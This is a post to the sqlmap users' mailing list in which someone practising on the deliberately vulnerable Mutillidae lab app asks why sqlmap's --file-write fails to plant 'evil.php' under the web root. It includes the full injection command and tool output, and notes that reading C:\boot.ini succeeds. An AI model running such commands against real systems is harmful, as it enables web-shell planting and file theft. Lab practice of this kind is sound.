Hi
I'm playing with file writing. I have a full privs root user set up in
mysql and am using
http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 to
play with. I've set up a /temp folder below the web root of the app.
I've put a file "evil.php" in the sqlmap working directory. I've also
changed the permissions for all users on the temp folder to write access
allowed.
I'm using the following input to try and upload this file:
C:\Program Files\sqlmap-0.9>python sqlmap.py -u "http://localhost/mutillidae/index.php?page=user-info.php" --data "username=&password=&user-info-php-submit-button=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085" --file-write "evil.php" --file-dest "temp/evil.php"
This is with the latest dev build by the way.
The output I get is:
[18:00:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[18:00:03] [INFO] fingerprinting the back-end DBMS operating system
[18:00:03] [INFO] the back-end DBMS operating system is Windows
[18:00:04] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
do you want confirmation that the file 'temp/evil.php' has been successfully written on the back-end DBMS file system? [Y/n]
[18:00:12] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[18:00:12] [WARNING] expect junk characters inside the file as a leftover from UNION query
[18:00:12] [INFO] Fetched data logged to text files under 'C:\Program Files\sqlmap-0.9\output\localhost'
[*] shutting down at 18:00:12
and sure enough the file isn't written. I've also tried using the --no-cast
switch, to no avail.
Does anyone have any ideas on what could be going wrong here? I can use the
--file-read switch to read any file such as C:\boot.ini. The --os-cmd and
--os-pwn commands also fail at the stager upload phase, probably for similar
reasons.
Any help would be appreciated
Cheers
Chris
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users